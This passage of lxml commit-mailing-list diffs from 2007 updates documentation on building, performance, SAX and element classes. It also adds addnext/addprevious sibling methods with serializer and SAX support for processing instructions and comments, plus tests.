@@ -133,17 +136,18 @@ XPath, XSLT or validation. -Why is my application so slow? ------------------------------- +How can I make my application run faster? +----------------------------------------- lxml.etree is a very fast library for processing XML. There are, however, `a few caveats`_ involved in the mapping of the powerful libxml2 library to the simple and convenient ElementTree API. Not all operations are as fast as the -simplicity of the API might suggest. The `benchmark page`_ has a comparison -to other ElementTree implementations and a number of tips for performance -tweaking. As with any Python application, the rule of thumb is: the more of -your processing runs in C, the faster your application gets. See also the -section on threading_. +simplicity of the API might suggest, while some use cases can heavily benefit +from finding the right way of doing them. The `benchmark page`_ has a +comparison to other ElementTree implementations and a number of tips for +performance tweaking. As with any Python application, the rule of thumb is: +the more of your processing runs in C, the faster your application gets. See +also the section on threading_. .. _`a few caveats`: performance.html#the-elementtree-api .. _`benchmark page`: performance.html @@ -167,6 +171,65 @@ .. _`build instructions`: build.html +Contributing +============ + +Why is lxml not written in Python? +---------------------------------- + +lxml interfaces with two C libraries: libxml2 and libxslt. Accessing them at +the C-level is required for performance reasons. + +To avoid writing plain C-code and caring too much about the details of +built-in types and reference counting, lxml is written in Pyrex_, a +Python-like language that is translated into C-code. Chances are that if you +know Python, you can write `code that Pyrex accepts`_. Again, the C-ish style +used in the lxml code is just for performance optimisations. If you want to +contribute, don't bother with the details, a Python implementation of your +contribution is better than none. And keep in mind that lxml's flexible API +often favours an implementation of features in pure Python, without bothering +with C-code at all. + +Please contact the `mailing list`_ if you need any help. + +.. _Pyrex: http://www.cosc.canterbury.ac.nz/greg.ewing/python/Pyrex/ +.. _`code that Pyrex accepts`: http://www.cosc.canterbury.ac.nz/greg.ewing/python/Pyrex/version/Doc/overview.html + + +How can I contribute? +--------------------- + +Besides enhancing the code, there are a lot of places where you can help the +project and its user base. You can + +* spread the word and write about lxml. Many users (especially new Python + users) have not yet heared about lxml, although our user base is constantly + growing. If you write your own blog and feel like saying something about + lxml, go ahead and do so. If we think your contribution or criticism is + valuable to other users, we may even put a link or a quote on the project + page. + +* provide code examples for the general usage of lxml or specific problems + solved with lxml. Readable code is a very good way of showing how a library + can be used and what great things you can do with it. Again, if we hear + about it, we can set a link on the project page. + +* work on the documentation. The web page is generated from a set of ReST_ + `text files`_. It is meant both as a representative project page for lxml + and as a site for documenting lxml's API and usage. If you have questions + or an idea how to make it more readable and accessible while you are reading + it, please send a comment to the `mailing list`_. + +.. _ReST: http://docutils.sourceforge.net/rst.html +.. _`text files`: http://codespeak.net/svn/lxml/trunk/doc/ + +* improve the docstrings. lxml uses docstrings to support Python's integrated + online ``help()`` function. However, sometimes these are not sufficient to + grasp the details of the function in question. If you find such a place, + you can try to write up a better description and send it to the `mailing + list`_. + + Bugs ==== @@ -176,7 +239,7 @@ One of the goals of lxml is "no segfaults", so if there is no clear warning in the documentation that you were doing something potentially harmful, you have found a bug and we would like to hear about it. Please report this bug to the -mailing list. See the next section on how to do that. +`mailing list`_. See the next section on how to do that. I think I have found a bug in lxml. What should I do? Modified: lxml/branch/lxml-1.3/doc/build.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/build.txt (original) +++ lxml/branch/lxml-1.3/doc/build.txt Tue Jun 12 18:53:57 2007 @@ -2,8 +2,10 @@ ============================= To build lxml from source, you need libxml2 and libxslt properly installed, -including header files (possibly shipped in -dev packages). The build process -also requires setuptools_. +*including the header files*. These are likely shipped in separate ``-dev`` +or ``-devel`` packages like ``libxml2-dev``, which you need to install. The +build process also requires setuptools_. The lxml source distribution comes +with a script called ``ez_setup.py`` that can be used to install them. .. _setuptools: http://peak.telecommunity.com/DevCenter/setuptools @@ -34,18 +36,22 @@ Newer versions of lxml depend on features and bug fixes that are not yet available in an official Pyrex release. This includes support for the - external C-API of lxml, for Python 2.5 and for 64 bit architectures. + external C-API of lxml.etree, for Python 2.5 and for 64 bit architectures. To build lxml 1.1 and later from non-release or modified sources, you must - therefore install an updated Pyrex version from here: + therefore use an updated Pyrex version from here: http://codespeak.net/svn/lxml/pyrex/ - Since version 1.1.2, the lxml source distribution includes this Pyrex - version. It will be used if the 'pyrex' directory is available in the lxml - root directory. If you install from SVN or delete this directory from the - unpacked distribution directory, the normally installed Pyrex version will - be used. + A subversion checkout of lxml will automatically retrieve the latest Pyrex + as external project source (``svn:externals``). Look out for the ``Pyrex`` + directory in the source tree. + + Since version 1.1.2, the lxml source distribution also includes this Pyrex + version. It will be used if the ``Pyrex`` directory is available in the + lxml root directory. If you install from SVN or delete this directory from + the unpacked distribution directory, the normally installed Pyrex version + will be used. * lxml 1.0 and earlier @@ -86,6 +92,10 @@ python setup.py build +or:: + + python setup.py bdist_egg + If you want to test lxml from the source directory, it is better to build it in-place like this:: @@ -96,15 +106,24 @@ make If you get errors about missing header files (e.g., ``libxml/xmlversion.h``) -then you need to add the location of that file to the include path like:: +then you need to make sure the development packages of libxml2 and libxslt are +properly installed. If this doesn't help, you may have to add the location of +the header files to the include path like:: - python setup.py build_ext -i -I /usr/include/libxml2 + python setup.py build_ext -i -I /usr/include/libxml2 where the file is in ``/usr/include/libxml2/libxml/xmlversion.h`` To use lxml.etree in-place, you can place lxml's ``src`` directory on your Python module search path (PYTHONPATH) and then import ``lxml.etree`` to play -with it. +with it:: + + # cd lxml + # PYTHONPATH=src python + Python 2.5.1 + Type "help", "copyright", "credits" or "license" for more information. + >>> from lxml import etree + >>> To recompile after changes, note that you may have to run ``make clean`` or delete the file ``src/lxml/etree.c``. Distutils do not automatically pick up @@ -125,8 +144,8 @@ make test -To run the ElementTree and cElementTree compatibility tests, make sure -you have lxml on your PYTHONPATH first, then run:: +This also runs the ElementTree and cElementTree compatibility tests. To call +them separately, make sure you have lxml on your PYTHONPATH first, then run:: python selftest.py @@ -147,15 +166,16 @@ This is the procedure to make an lxml egg for your platform: -* download the lxml-x.y.tar.gz release. This contains the pregenerated C so we - don't run into any Pyrex issues. Unpack it and cd into it. +* Download the lxml-x.y.tar.gz release. This contains the pregenerated C so + that you don't run into any Pyrex issues. Unpack it and cd into it. * python setup.py build -* if you're on a unixy platform, cd into build/lib.your.platform and - strip any .so file you find there. This reduces the size of the egg. +* If you're on a unixy platform, cd into ``build/lib.your.platform`` and strip + any ``.so`` file you find there. This reduces the size of the egg + considerably. -* python setup.py bdist_egg upload +* ``python setup.py bdist_egg upload`` The last 'upload' step only works if you have access to the lxml cheeseshop entry. If not, you can just make an egg with ``bdist_egg`` and mail it to the Modified: lxml/branch/lxml-1.3/doc/performance.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/performance.txt (original) +++ lxml/branch/lxml-1.3/doc/performance.txt Tue Jun 12 18:53:57 2007 @@ -14,7 +14,7 @@ .. _ElementTree: http://effbot.org/zone/element-index.htm .. _cElementTree: http://effbot.org/zone/celementtree.htm -The statements made here are backed by the benchmark scripts +The statements made here are backed by the (micro-)benchmark scripts `bench_etree.py`_, `bench_xpath.py`_ and `bench_objectify.py`_ that come with the lxml source distribution. The timings cited below compare lxml 1.3 (with libxml2 2.6.26) to the ElementTree and cElementTree versions shipped with @@ -30,10 +30,22 @@ attributes (-/A), with or without ASCII or unicode text (-/S/U), and either against a tree or its serialised form (T/X). In the result extracts cited below, T1 refers to a 3-level tree with many children at the third level, T2 -is swapped around to have many children at the root element, T3 is a deep tree -with few children at each level and T4 is a small tree, slightly broader than -deep. If repetition is involved, this usually means running the benchmark in -a loop over all children of the tree root. +is swapped around to have many children below the root element, T3 is a deep +tree with few children at each level and T4 is a small tree, slightly broader +than deep. If repetition is involved, this usually means running the +benchmark in a loop over all children of the tree root, otherwise, the +operation is run on the root node (C/R). + +As an example, the character code ``(SATR T1)`` states that the benchmark was +running for tree T1, with plain string text (S) and attributes (A). It was +run against the root element (R) in the tree structure of the data (T). + +Note that very small operations are repeated in integer loops to make them +measurable. It is therefore not always possible to compare the absolute +timings of, say, a single access benchmark (which usually loops) and a 'get +all in one step' benchmark, which already takes enough time to be measurable +and is therefore measured as is. Take a look at the concrete benchmarks in +the scripts to understand how the numbers compare. .. contents:: .. @@ -48,11 +60,11 @@ Bad things first ---------------- -First thing to say: there *is* an overhead involved in having a C library -mimic the ElementTree API. As opposed to ElementTree, lxml has to generate -Python objects on the fly when asked for them. What this means is: the more -of your code runs in Python, the slower your application gets. Note, however, -that this is true for most performance critical Python applications. +First thing to say: there *is* an overhead involved in having a DOM-like C +library mimic the ElementTree API. As opposed to ElementTree, lxml has to +generate Python objects on the fly when asked for them. What this means is: +the more of your code runs in Python, the slower your application gets. Note, +however, that this is true for most performance critical Python applications. Parsing and Serialising @@ -132,20 +144,20 @@ (given in seconds):: lxe: -- S- U- -A SA UA - T1: 0.1029 0.1005 0.0998 0.1003 0.0998 0.1002 - T2: 0.1035 0.1013 0.1015 0.1090 0.1089 0.1090 - T3: 0.0276 0.0270 0.0273 0.0679 0.0673 0.0673 - T4: 0.0004 0.0004 0.0004 0.0013 0.0013 0.0013 + T1: 0.1155 0.1154 0.1153 0.1159 0.1181 0.1158 + T2: 0.1183 0.1197 0.1200 0.1267 0.1261 0.1264 + T3: 0.0341 0.0312 0.0314 0.0726 0.0717 0.0720 + T4: 0.0005 0.0004 0.0004 0.0014 0.0014 0.0014 cET: -- S- U- -A SA UA - T1: 0.0277 0.0273 0.0273 0.0272 0.0278 0.0275 - T2: 0.0281 0.0347 0.0281 0.0285 0.0284 0.0284 - T3: 0.0074 0.0074 0.0074 0.0122 0.0102 0.0101 + T1: 0.0290 0.0271 0.0275 0.0297 0.0273 0.0274 + T2: 0.0280 0.0280 0.0281 0.0285 0.0283 0.0286 + T3: 0.0071 0.0072 0.0071 0.0113 0.0096 0.0096 T4: 0.0001 0.0001 0.0001 0.0001 0.0001 0.0001 ET : -- S- U- -A SA UA - T1: 0.1349 0.1962 0.2356 0.1288 0.2642 0.1351 - T2: 0.3104 0.1344 0.3566 0.3857 0.1354 0.4677 - T3: 0.0313 0.0325 0.0312 0.0356 0.3803 0.0364 - T4: 0.0005 0.0005 0.0008 0.0006 0.0007 0.0006 + T1: 0.1362 0.1985 0.2300 0.1344 0.2672 0.1335 + T2: 0.3107 0.1386 0.3581 0.3886 0.1388 0.4277 + T3: 0.0334 0.0332 0.0320 0.0367 0.3769 0.0375 + T4: 0.0006 0.0005 0.0008 0.0007 0.0007 0.0006 While lxml is still faster than ET in most cases (30-60%), cET can be up to three times faster than lxml here. One of the reasons is that lxml must @@ -161,6 +173,29 @@ cET: root_getchildren (--TR T2) 0.0150 msec/pass ET : root_getchildren (--TR T2) 0.0091 msec/pass +When accessing single children, however, e.g. by index, this handicap is +negligible:: + + lxe: first_child (--TR T2) 0.2499 msec/pass + cET: first_child (--TR T2) 0.2048 msec/pass + ET : first_child (--TR T2) 0.9291 msec/pass + + lxe: last_child (--TR T1) 0.2511 msec/pass + cET: last_child (--TR T1) 0.2148 msec/pass + ET : last_child (--TR T1) 0.9191 msec/pass + +... unless you add the time to find a child index in a bigger list, as ET and +cET use Python lists here, which are based on arrays. The data structure used +by libxml2 is a linked tree, and thus, a linked list of children:: + + lxe: middle_child (--TR T1) 0.2921 msec/pass + cET: middle_child (--TR T1) 0.2069 msec/pass + ET : middle_child (--TR T1) 0.9291 msec/pass + + lxe: middle_child (--TR T2) 1.9028 msec/pass + cET: middle_child (--TR T2) 0.2089 msec/pass + ET : middle_child (--TR T2) 0.9360 msec/pass + As opposed to ET, libxml2 has a notion of documents that each element must be in. This results in a major performance difference for creating independent Elements that end up in independently created documents:: Modified: lxml/branch/lxml-1.3/doc/sax.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/sax.txt (original) +++ lxml/branch/lxml-1.3/doc/sax.txt Tue Jun 12 18:53:57 2007 @@ -39,6 +39,10 @@ >>> lxml.etree.tostring(tree.getroot()) '<a><b foo="bar">Hello world</b></a>' +By passing a ``makeelement`` function the constructor of +``ElementTreeContentHandler``, e.g. the one of a parser you configured, you +can determine which element class lookup scheme should be used. + Producing SAX events from an ElementTree or Element --------------------------------------------------- Modified: lxml/branch/lxml-1.3/src/lxml/apihelpers.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/apihelpers.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/apihelpers.pxi Tue Jun 12 18:53:57 2007 @@ -518,7 +518,6 @@ c_node = child._c_node # store possible text node c_next = c_node.next - # XXX what if element is coming from a different document? tree.xmlUnlinkNode(c_node) # move node itself tree.xmlAddChild(parent._c_node, c_node) @@ -527,6 +526,38 @@ # parent element has moved; change them too.. moveNodeToDocument(child, parent._doc) +cdef void _appendSibling(_Element element, _Element sibling): + """Append a new child to a parent element. + """ + cdef xmlNode* c_next + cdef xmlNode* c_node + c_node = sibling._c_node + # store possible text node + c_next = c_node.next + tree.xmlUnlinkNode(c_node) + # move node itself + tree.xmlAddNextSibling(element._c_node, c_node) + _moveTail(c_next, c_node) + # uh oh, elements may be pointing to different doc when + # parent element has moved; change them too.. + moveNodeToDocument(sibling, element._doc) + +cdef void _prependSibling(_Element element, _Element sibling): + """Append a new child to a parent element. + """ + cdef xmlNode* c_next + cdef xmlNode* c_node + c_node = sibling._c_node + # store possible text node + c_next = c_node.next + tree.xmlUnlinkNode(c_node) + # move node itself + tree.xmlAddPrevSibling(element._c_node, c_node) + _moveTail(c_next, c_node) + # uh oh, elements may be pointing to different doc when + # parent element has moved; change them too.. + moveNodeToDocument(sibling, element._doc) + cdef int isutf8(char* s): cdef char c c = s[0] Modified: lxml/branch/lxml-1.3/src/lxml/etree.pyx ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/etree.pyx (original) +++ lxml/branch/lxml-1.3/src/lxml/etree.pyx Tue Jun 12 18:53:57 2007 @@ -531,6 +531,36 @@ """ _appendChild(self, element) + def addnext(self, _Element element): + """Adds the element as a following sibling directly after this + element. + + This is normally used to set a processing instruction or comment after + the root node of a document. Note that tail text is automatically + discarded when adding at the root level. + """ + if self._c_node.parent != NULL and not _isElement(self._c_node.parent): + if element._c_node.type != tree.XML_PI_NODE: + if element._c_node.type != tree.XML_COMMENT_NODE: + raise TypeError, "Only processing instructions and comments can be siblings of the root element" + element.tail = None + _appendSibling(self, element) + + def addprevious(self, _Element element): + """Adds the element as a preceding sibling directly before this + element. + + This is normally used to set a processing instruction or comment + before the root node of a document. Note that tail text is + automatically discarded when adding at the root level. + """ + if self._c_node.parent != NULL and not _isElement(self._c_node.parent): + if element._c_node.type != tree.XML_PI_NODE: + if element._c_node.type != tree.XML_COMMENT_NODE: + raise TypeError, "Only processing instructions and comments can be siblings of the root element" + element.tail = None + _prependSibling(self, element) + def extend(self, elements): """Extends the current children by the elements in the iterable. """ @@ -1096,6 +1126,9 @@ def items(self): return [] + def values(self): + return [] + cdef class _Comment(__ContentOnlyElement): property tag: def __get__(self): @@ -1749,6 +1782,8 @@ tree.xmlAddChild(<xmlNode*>c_doc, c_node) return _elementFactory(doc, c_node) +PI = ProcessingInstruction + def SubElement(_Element _parent not None, _tag, attrib=None, nsmap=None, **_extra): """Subelement factory. This function creates an element instance, and appends it to an Modified: lxml/branch/lxml-1.3/src/lxml/sax.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/sax.py (original) +++ lxml/branch/lxml-1.3/src/lxml/sax.py Tue Jun 12 18:53:57 2007 @@ -1,5 +1,6 @@ from xml.sax.handler import ContentHandler from etree import ElementTree, Element, SubElement, LxmlError +from etree import XML, Comment, ProcessingInstruction class SaxError(LxmlError): pass @@ -15,6 +16,7 @@ """ def __init__(self, makeelement=None): self._root = None + self._root_siblings = [] self._element_stack = [] self._default_ns = None self._ns_mapping = { None : [None] } @@ -82,6 +84,10 @@ if self._root is None: element = self._root = \ self._makeelement(el_name, attrs, self._new_mappings) + if self._root_siblings and hasattr(element, 'addprevious'): + for sibling in self._root_siblings: + element.addprevious(sibling) + del self._root_siblings[:] else: element = SubElement(element_stack[-1], el_name, attrs, self._new_mappings) @@ -89,10 +95,16 @@ self._new_mappings.clear() + def processingInstruction(self, target, data): + pi = ProcessingInstruction(target, data) + if self._root is None: + self._root_siblings.append(pi) + else: + self._element_stack[-1].append(pi) + def endElementNS(self, ns_name, qname): element = self._element_stack.pop() - tag = element.tag - if ns_name != _getNsTag(tag): + if ns_name != _getNsTag(element.tag): raise SaxError, "Unexpected element closed: {%s}%s" % ns_name def startElement(self, name, attributes=None): @@ -106,10 +118,13 @@ try: # if there already is a child element, we must append to its tail last_element = last_element[-1] - last_element.tail = (last_element.tail or u'') + data + last_element.tail = (last_element.tail or '') + data except IndexError: # otherwise: append to the text - last_element.text = (last_element.text or u'') + data + last_element.text = (last_element.text or '') + data + + ignorableWhitespace = characters + class ElementTreeProducer(object): """Produces SAX events for an element and children. @@ -124,13 +139,41 @@ from xml.sax.xmlreader import AttributesNSImpl as attr_class self._attr_class = attr_class self._empty_attributes = attr_class({}, {}) - + def saxify(self): self._content_handler.startDocument() - self._recursive_saxify(self._element, {}) + + element = self._element + if hasattr(element, 'getprevious'): + siblings = [] + sibling = element.getprevious() + while getattr(sibling, 'tag', None) is ProcessingInstruction: + siblings.append(sibling) + sibling = sibling.getprevious() + for sibling in siblings[::-1]: + self._recursive_saxify(sibling, {}) + + self._recursive_saxify(element, {}) + + if hasattr(element, 'getnext'): + sibling = element.getnext() + while getattr(sibling, 'tag', None) is ProcessingInstruction: + self._recursive_saxify(sibling, {}) + sibling = sibling.getnext() + self._content_handler.endDocument() def _recursive_saxify(self, element, prefixes): + content_handler = self._content_handler + tag = element.tag + if tag is Comment or tag is ProcessingInstruction: + if tag is ProcessingInstruction: + content_handler.processingInstruction( + element.target, element.text) + if element.tail: + content_handler.characters(element.tail) + return + new_prefixes = [] build_qname = self._build_qname attribs = element.items() @@ -146,10 +189,9 @@ else: sax_attributes = self._empty_attributes - ns_uri, local_name = _getNsTag(element.tag) + ns_uri, local_name = _getNsTag(tag) qname = build_qname(ns_uri, local_name, prefixes, new_prefixes) - content_handler = self._content_handler for prefix, uri in new_prefixes: content_handler.startPrefixMapping(prefix, uri) content_handler.startElementNS((ns_uri, local_name), Modified: lxml/branch/lxml-1.3/src/lxml/serializer.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/serializer.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/serializer.pxi Tue Jun 12 18:53:57 2007 @@ -78,8 +78,10 @@ if write_xml_declaration: _writeDeclarationToBuffer(c_buffer, c_doc.version, encoding) + _writePrevSiblings(c_buffer, c_node, encoding, pretty_print) tree.xmlNodeDumpOutput(c_buffer, c_doc, c_node, 0, pretty_print, encoding) _writeTail(c_buffer, c_node, encoding, pretty_print) + _writeNextSiblings(c_buffer, c_node, encoding, pretty_print) cdef void _writeDeclarationToBuffer(tree.xmlOutputBuffer* c_buffer, char* version, char* encoding): @@ -100,6 +102,36 @@ pretty_print, encoding) c_node = c_node.next +cdef void _writePrevSiblings(tree.xmlOutputBuffer* c_buffer, xmlNode* c_node, + char* encoding, int pretty_print): + cdef xmlNode* c_sibling + if c_node.parent is not NULL and _isElement(c_node.parent): + return + # we are at a root node, so add PI and comment siblings + c_sibling = c_node + while c_sibling.prev != NULL and \ + (c_sibling.prev.type == tree.XML_PI_NODE or \ + c_sibling.prev.type == tree.XML_COMMENT_NODE): + c_sibling = c_sibling.prev + while c_sibling != c_node: + tree.xmlNodeDumpOutput(c_buffer, c_node.doc, c_sibling, 0, + pretty_print, encoding) + c_sibling = c_sibling.next + +cdef void _writeNextSiblings(tree.xmlOutputBuffer* c_buffer, xmlNode* c_node, + char* encoding, int pretty_print): + cdef xmlNode* c_sibling + if c_node.parent is not NULL and _isElement(c_node.parent): + return + # we are at a root node, so add PI and comment siblings + c_sibling = c_node.next + while c_sibling != NULL and \ + (c_sibling.type == tree.XML_PI_NODE or \ + c_sibling.type == tree.XML_COMMENT_NODE): + tree.xmlNodeDumpOutput(c_buffer, c_node.doc, c_sibling, 0, + pretty_print, encoding) + c_sibling = c_sibling.next + # output to file-like objects cdef class _FilelikeWriter: Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py (original) +++ lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py Tue Jun 12 18:53:57 2007 @@ -404,6 +404,156 @@ Element = self.etree.Element self.assertRaises(TypeError, Element('a').append, None) + def test_addnext(self): + Element = self.etree.Element + SubElement = self.etree.SubElement + root = Element('root') + SubElement(root, 'a') + SubElement(root, 'b') + + self.assertEquals(['a', 'b'], + [c.tag for c in root]) + root[1].addnext(root[0]) + self.assertEquals(['b', 'a'], + [c.tag for c in root]) + + def test_addprevious(self): + Element = self.etree.Element + SubElement = self.etree.SubElement + root = Element('root') + SubElement(root, 'a') + SubElement(root, 'b') + + self.assertEquals(['a', 'b'], + [c.tag for c in root]) + root[0].addprevious(root[1]) + self.assertEquals(['b', 'a'], + [c.tag for c in root]) + + def test_addnext_root(self): + Element = self.etree.Element + a = Element('a') + b = Element('b') + self.assertRaises(TypeError, a.addnext, b) + + def test_addnext_root(self): + Element = self.etree.Element + a = Element('a') + b = Element('b') + self.assertRaises(TypeError, a.addnext, b) + + def test_addprevious_pi(self): + Element = self.etree.Element + SubElement = self.etree.SubElement + PI = self.etree.PI + root = Element('root') + SubElement(root, 'a') + pi = PI('TARGET', 'TEXT') + pi.tail = "TAIL" + + self.assertEquals('<root><a></a></root>', + self._writeElement(root)) + root[0].addprevious(pi) + self.assertEquals('<root><?TARGET TEXT?>TAIL<a></a></root>', + self._writeElement(root)) + + def test_addprevious_root_pi(self): + Element = self.etree.Element + PI = self.etree.PI + root = Element('root') + pi = PI('TARGET', 'TEXT') + pi.tail = "TAIL" + + self.assertEquals('<root></root>', + self._writeElement(root)) + root.addprevious(pi) + self.assertEquals('<?TARGET TEXT?>\n<root></root>', + self._writeElement(root)) + + def test_addnext_pi(self): + Element = self.etree.Element + SubElement = self.etree.SubElement + PI = self.etree.PI + root = Element('root') + SubElement(root, 'a') + pi = PI('TARGET', 'TEXT') + pi.tail = "TAIL" + + self.assertEquals('<root><a></a></root>', + self._writeElement(root)) + root[0].addnext(pi) + self.assertEquals('<root><a></a><?TARGET TEXT?>TAIL</root>', + self._writeElement(root)) + + def test_addnext_root_pi(self): + Element = self.etree.Element + PI = self.etree.PI + root = Element('root') + pi = PI('TARGET', 'TEXT') + pi.tail = "TAIL" + + self.assertEquals('<root></root>', + self._writeElement(root)) + root.addnext(pi) + self.assertEquals('<root></root>\n<?TARGET TEXT?>', + self._writeElement(root)) + + def test_addnext_comment(self): + Element = self.etree.Element + SubElement = self.etree.SubElement + Comment = self.etree.Comment + root = Element('root') + SubElement(root, 'a') + comment = Comment('TEXT ') + comment.tail = "TAIL" + + self.assertEquals('<root><a></a></root>', + self._writeElement(root)) + root[0].addnext(comment) + self.assertEquals('<root><a></a><!--TEXT -->TAIL</root>', + self._writeElement(root)) + + def test_addnext_root_comment(self): + Element = self.etree.Element + Comment = self.etree.Comment + root = Element('root') + comment = Comment('TEXT ') + comment.tail = "TAIL" + + self.assertEquals('<root></root>', + self._writeElement(root)) + root.addnext(comment) + self.assertEquals('<root></root>\n<!--TEXT -->', + self._writeElement(root)) + + def test_addprevious_comment(self): + Element = self.etree.Element + SubElement = self.etree.SubElement + Comment = self.etree.Comment + root = Element('root') + SubElement(root, 'a') + comment = Comment('TEXT ') + comment.tail = "TAIL" + + self.assertEquals('<root><a></a></root>', + self._writeElement(root)) + root[0].addprevious(comment) + self.assertEquals('<root><!--TEXT -->TAIL<a></a></root>', + self._writeElement(root)) + + def test_addprevious_root_comment(self): + Element = self.etree.Element + Comment = self.etree.Comment + root = Element('root') + comment = Comment('TEXT ') + comment.tail = "TAIL" + + self.assertEquals('<root></root>', + self._writeElement(root)) + root.addprevious(comment) + self.assertEquals('<!--TEXT -->\n<root></root>', + self._writeElement(root)) + # gives error in ElementTree def test_comment_empty(self): Element = self.etree.Element Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_sax.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/tests/test_sax.py (original) +++ lxml/branch/lxml-1.3/src/lxml/tests/test_sax.py Tue Jun 12 18:53:57 2007 @@ -25,6 +25,30 @@ self.assertEquals('<a>ab<b>bb</b>ba</a>', xml_out) + def test_etree_sax_comment(self): + tree = self.parse('<a>ab<!-- TEST -->ba</a>') + xml_out = self._saxify_serialize(tree) + self.assertEquals('<a>abba</a>', + xml_out) + + def test_etree_sax_pi(self): + tree = self.parse('<a>ab<?this and that?>ba</a>') + xml_out = self._saxify_serialize(tree) + self.assertEquals('<a>ab<?this and that?>ba</a>', + xml_out) + + def test_etree_sax_comment_root(self): + tree = self.parse('<!-- TEST --><a>ab</a>') + xml_out = self._saxify_serialize(tree) + self.assertEquals('<a>ab</a>', + xml_out) + + def test_etree_sax_pi_root(self): + tree = self.parse('<?this and that?><a>ab</a>') + xml_out = self._saxify_serialize(tree) + self.assertEquals('<?this and that?><a>ab</a>', + xml_out) + def test_etree_sax_attributes(self): tree = self.parse('<a aa="5">ab<b b="5"/>ba</a>') xml_out = self._saxify_serialize(tree) From scoder at codespeak.net Tue Jun 12 19:00:37 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 19:00:37 +0200 (CEST) Subject: [Lxml-checkins] r44181 - lxml/branch/lxml-1.3/doc Message-ID: <20070612170037.125638194@code0.codespeak.net> Author: scoder Date: Tue Jun 12 19:00:36 2007 New Revision: 44181 Modified: lxml/branch/lxml-1.3/doc/element_classes.txt lxml/branch/lxml-1.3/doc/resolvers.txt lxml/branch/lxml-1.3/doc/xpathxslt.txt Log: doc updates from trunk (XPath/XSLT) Modified: lxml/branch/lxml-1.3/doc/element_classes.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/element_classes.txt (original) +++ lxml/branch/lxml-1.3/doc/element_classes.txt Tue Jun 12 19:00:36 2007 @@ -4,8 +4,8 @@ lxml has very sophisticated support for custom Element classes. You can provide your own classes for Elements and have lxml use them by default, for -all elements generated by a specific parser or only for a specific tag name in -a specific namespace. +all elements generated by a specific parser, for a specific tag name in a +specific namespace or for an exact element at a specific position in the tree. Custom Elements must inherit from the ``lxml.etree.ElementBase`` class, which provides the Element interface for subclasses:: @@ -33,7 +33,7 @@ Element initialization ----------------------- +====================== There is one thing to know up front. Element classes *must not* have a constructor, neither must there be any internal state (except for the data @@ -43,10 +43,12 @@ called, the object may not even be initialized yet to represent the XML tag, so there is not much use in providing an ``__init__`` method in subclasses. -However, there is one possible way to do things on element initialization, if -you really need to. ElementBase classes have an ``_init()`` method that can -be overridden. It can be used to modify the XML tree, e.g. to construct -special children or verify and update attributes. +Most use cases will not require any class initialisation, so you can content +yourself with skipping to the next section for now. However, if you really +need to set up your element class on instantiation, there is one possible way +to do so. ElementBase classes have an ``_init()`` method that can be +overridden. It can be used to modify the XML tree, e.g. to construct special +children or verify and update attributes. The semantics of ``_init()`` are as follows: @@ -72,7 +74,7 @@ Setting up a class lookup scheme --------------------------------- +================================ The first thing to do when deploying custom element classes is to register a class lookup scheme on a parser. lxml.etree provides quite a number of @@ -139,7 +141,7 @@ Default class lookup -.................... +-------------------- This is the most simple lookup mechanism. It always returns the default element class. Consequently, no further fallbacks are supported, but this @@ -178,7 +180,7 @@ Namespace class lookup -...................... +---------------------- This is an advanced lookup mechanism that supports namespace/tag-name specific element classes. You can select it by calling:: @@ -203,14 +205,15 @@ Attribute based lookup -...................... +---------------------- This scheme uses a mapping from attribute values to classes. An attribute name is set at initialisation time and is then used to find the corresponding value. It is set up as follows:: >>> id_class_mapping = {} # maps attribute values to element classes - >>> lookup = etree.AttributeBasedElementClassLookup('id', id_class_mapping) + >>> lookup = etree.AttributeBasedElementClassLookup( + ... 'id', id_class_mapping) >>> parser = etree.XMLParser() >>> parser.setElementClassLookup(lookup) @@ -229,7 +232,7 @@ Custom element class lookup -........................... +--------------------------- This is the most customisable way of finding element classes. It allows you to implement a custom lookup scheme in a subclass:: @@ -251,7 +254,7 @@ Implementing namespaces ------------------------ +======================= lxml allows you to implement namespaces, in a rather literal sense. After setting up the namespace class lookup mechanism as described above, you can Modified: lxml/branch/lxml-1.3/doc/resolvers.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/resolvers.txt (original) +++ lxml/branch/lxml-1.3/doc/resolvers.txt Tue Jun 12 19:00:36 2007 @@ -3,13 +3,20 @@ .. contents:: .. - 1 Document loaders in context - 2 I/O access control in XSLT + 1 Resolvers + 2 Document loading in context + 3 I/O access control in XSLT Lxml has support for custom document loaders in both the parsers and XSL transformations. These so-called resolvers are subclasses of the -etree.Resolver class as in the following example:: +etree.Resolver class. + + +Resolvers +--------- + +Here is an example of a custom resolver:: >>> from lxml import etree @@ -32,10 +39,10 @@ * ``resolve_file`` takes an open file-like object that has at least a read() method * ``resolve_empty`` resolves into an empty document -The ``resolve`` method may choose to return None, in which case the next -registered resolver (or the default resolver) is consulted. It is never -called if the resolver returns the result of any of the above ``resolve_*`` -methods. +The ``resolve()`` method may choose to return None, in which case the next +registered resolver (or the default resolver) is consulted. Resolving always +terminates if ``resolve()`` returns the result of any of the above +``resolve_*()`` methods. Resolvers are registered local to a parser:: @@ -58,7 +65,7 @@ fragment. -Document loaders in context +Document loading in context --------------------------- XML documents memorise their initial parser (and its resolvers) during their @@ -180,12 +187,16 @@ I/O access control in XSLT -------------------------- -XSLT has an additional mechanism to control the access to certain I/O -operations during the transformation process. This is most interesting where -XSL scripts come from potentially insecure sources and must be prevented from -modifying the local file system. Note, however, that there is no way to keep -them from eating up your precious CPU time, so this should not stop you from -thinking about what XSLT you execute. +By default, XSLT supports all extension functions from libxslt and libexslt as +well as Python regular expressions through EXSLT. Some extensions enable +style sheets to read and write files on the local file system. + +XSLT has a mechanism to control the access to certain I/O operations during +the transformation process. This 